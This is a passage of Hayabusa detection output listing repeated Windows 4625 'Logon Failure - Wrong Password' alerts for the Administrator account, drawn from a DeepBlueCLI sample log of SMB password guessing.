Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:33.974 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.019 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.235 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.354 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.941 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:34.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.073 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.118 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.291 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.717 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.885 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:35.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.422 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.681 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon 